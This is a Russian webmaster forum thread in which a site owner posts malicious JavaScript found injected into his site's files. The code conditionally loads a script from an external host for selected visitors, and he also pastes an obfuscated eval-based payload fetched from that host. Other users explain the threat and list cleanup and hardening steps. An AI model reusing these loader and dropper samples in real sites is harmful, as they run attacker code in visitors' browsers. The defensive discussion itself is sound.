- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сегодня на страницах своих ресурсов нашел такой код:
function get_cookie(Name) {
var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;
}
function set_cookie(name, value) {
var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}
var br_reg = /(Firefox|MSIE|Opera)/i;
var usr_os = navigator.userAgent;
var ref_reg = /(yandex|google|mail|rambler|vk.com)/i;
var ref = document.referrer;
if (ref==null) ref='';
var lang = (navigator.language ||
navigator.systemLanguage ||
navigator.userLanguage ||
'en').substr(0, 2).toLowerCase();
var useragent_reg = /(bot|yandex|yx)/i
var useragent = navigator.userAgent;
if(get_cookie('viewpages') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg) && ref.match(ref_reg) &&
(lang=="ru" || lang=="ua" || lang=="by" || lang=="kz") && (!useragent.match(useragent_reg)) )
{
var script = document.createElement('script');
script.src = 'http://grandsteel.kz/stats.php';
document.head.appendChild(script);
set_cookie('viewpages', '8ihdf8hiio9000yud9');
};
Почти все js файлы и часть php подверглась изменению. Что эта хрень делает или непонятно?
Пароли сменил, файлы заменяю. Что-то еще надо сделать? И можно ли на виртуальном хостинге сделать поиск по файлам, на наличие определенного кода?
Пароли сменил, файлы заменяю. Что-то еще надо сделать? И можно ли на виртуальном хостинге сделать поиск по файлам, на наличие определенного кода?
Искать шелы нужно, а не пароли менять... + искать дыру через которую шелы залиты.
Скрипт для поиска шелов - http://revisium.com/ai/
Но лучше сразу обратиться к специалистам.
Скорее логин от ФТП ушел, тупанул я. Несколько человек имели логин и пароль, когда сайт запускал и не сменил его, все откладывал, дооткладывался.
Кусок лога, что прислал хостер:
Все таки, что это код залитый делает?
1. Закрываем папки на запись (где запись доступна(кеш, etc), ограничиваем доступ из веба, если есть такая возможность)
2. Закрываем FTP по 1 ip(свой либо диапазон)
3. Своевременно обновляем движки
4. Никогда не ставим null-версии, либо какие-то закодированные скрипты.
5. В идеале все сайты изолируем друг от друга (vps очень хороший вариант, также меняем стандартные порты на иные значения)
6. Не используем "дырявые" CMS и модули к ним (dle, wp (не сам, а именно модулей много дырявых)
7. Ставим сайты на мониторинг (самописный софт или готовые решения) проверяем новые ссылки, js, фреймы и другие интересные места
8. Юзаем айболит - раз в недельку нормально для профилактики
9. На рабочем компьютере используем качественный лицензионный антивирус, в идеале профилактику проводить сторонними продуктами.
10. НА "странные" сайты лучше заходить с бука или с виртуальной машины ,если есть в этом нужда
11. Защищаем админку сайта максимально (в идеале по ip)
12. Используем везде разные пароли, не менее 12 символов {a-zA-Z0-9} как минимум верхний/нижний регистр + цифры, без явных последовательностей.
13. Используем разные почтовые ящики.
Это - самый минимум.
/GqvWbYyF.gif /robots.txt
Да уж, как-то не вяжется javascript код и "часть php файлов" с robots.txt.
Все таки, что это код залитый делает?
Добавляет на странице скрипт с указанного сайта.
Да уж, как-то не вяжется javascript код и "часть php файлов" с robots.txt.
В смысле не вяжется?
Добавляет на странице скрипт с указанного сайта.
Так, еще раз. Это js что делает? Не только же обращение к http://grandsteel.kz/stats.php или как раз это он и делает, а что уже делает скрипт stats.php неизвестно?
Все таки, что это код залитый делает?
Предварительно он говорит: здравствуй админка, привел тебе русскоязычного юзера под виндой, какие будут дальнейшие указания, что показать на ломаной странице изволите.
Чем опасно помимо "вирусни" на страницах. Если юзер авторизован и привязки сессии по айпишнику нет - хакер может взять куку и станет авторизован на сайте покуда кто-нибудь log out не сделает, т.е. будут на сайте два админа, вы и он.
Все таки, что это код залитый делает?
Собирает статистику (откуда посетитель пришел), подключает сторонний JS, ставит куку.
Подключенный скрипт в зависимости от реферера может, например, перекинуть на фиктивную (фишинговую для mail.ru, сайт конкурента для какого-нибудь поискового запроса) страницу..
arkadiy_a, менять всем пользователям форума пароли или можно обойтись менее суровой мерой?
---------- Добавлено 28.01.2013 в 21:35 ----------
Интересный код выдался, когда перешел по ссылки на этот скрипт из темы:
try{document.body*=2}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(9,8,103,99,32,39,98,108,99,116,107,98,110,115,44,100,101,115,67,105,101,108,99,107,116,114,64,118,84,96,101,75,97,108,99,37,39,97,109,97,121,38,39,88,48,92,39,120,13,8,7,6,105,101,112,94,109,100,112,37,41,58,11,6,9,124,30,98,108,114,99,29,123,12,7,6,9,99,109,96,117,108,99,107,116,45,117,111,105,115,99,37,34,59,103,99,114,96,107,98,32,114,112,96,61,38,102,113,116,111,56,44,47,116,108,112,117,97,113,96,114,104,96,98,100,45,113,94,102,100,101,114,97,113,98,102,110,102,110,108,114,100,116,102,118,104,108,100,104,112,114,43,111,113,101,44,109,104,114,111,97,94,96,94,115,115,95,111,100,114,93,104,114,104,106,105,39,31,117,102,100,115,102,58,39,48,46,45,39,31,102,98,105,102,102,113,61,38,47,45,48,38,30,112,116,120,106,98,61,38,117,102,100,115,102,55,49,47,46,109,120,58,102,98,105,102,102,113,58,48,46,45,112,119,57,109,111,114,103,113,105,110,108,55,97,97,113,108,108,116,114,98,59,117,103,112,105,97,103,105,105,115,119,55,104,104,98,97,101,109,57,105,101,101,114,55,45,48,46,45,48,47,110,117,59,115,109,109,58,47,57,36,62,59,45,102,102,113,95,106,101,61,32,38,59,12,7,6,125,12,7,6,102,116,108,96,116,104,109,107,32,104,100,111,97,108,99,111,40,40,121,10,9,8,7,115,97,113,30,99,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,102,45,113,98,116,64,114,113,114,104,96,114,116,100,38,36,115,113,97,36,44,38,102,113,116,111,56,44,47,116,108,112,117,97,113,96,114,104,96,98,100,45,113,94,102,100,101,114,97,113,98,102,110,102,110,108,114,100,116,102,118,104,108,100,104,112,114,43,111,113,101,44,109,104,114,111,97,94,96,94,115,115,95,111,100,114,93,104,114,104,106,105,39,40,57,99,46,114,114,118,108,100,44,105,101,101,114,58,39,44,47,45,48,47,46,109,120,38,57,99,46,114,114,118,108,100,44,115,105,114,103,95,105,107,103,113,121,60,37,101,105,99,98,98,110,38,57,99,46,114,114,118,108,100,44,113,111,111,59,36,48,38,57,99,46,114,114,118,108,100,44,109,111,114,103,113,105,110,108,58,39,96,96,112,111,107,115,113,101,38,57,99,46,114,114,118,108,100,44,113,111,111,59,36,48,38,57,99,46,114,99,113,65,115,114,111,105,97,115,113,101,39,37,116,105,99,114,101,39,43,37,46,48,47,37,38,59,101,44,112,101,115,63,113,116,113,103,95,117,115,99,37,39,103,99,102,103,103,114,36,44,38,47,45,48,38,39,56,13,8,7,6,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,112,66,120,82,94,103,77,95,106,101,39,37,95,111,99,119,36,41,90,46,90,46,96,110,109,101,109,98,64,104,104,106,97,40,101,39,56,13,8,7,122);}w=f;s=[];for(i=0;-i+708!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)}Что это может быть или непонятно?
arkadiy_a, менять всем пользователям форума пароли или можно обойтись менее суровой мерой?
Менять, особенно если форумом и посетителями дорожите и не хотите потом лишней работы по выпиливанию спама из-под ломаных аккаунтов.
Но по идеи, ничего более паролей утащить не могли? Т.е. только с форума, если человек к себе в почту перешел с форума, уже не утянут данные?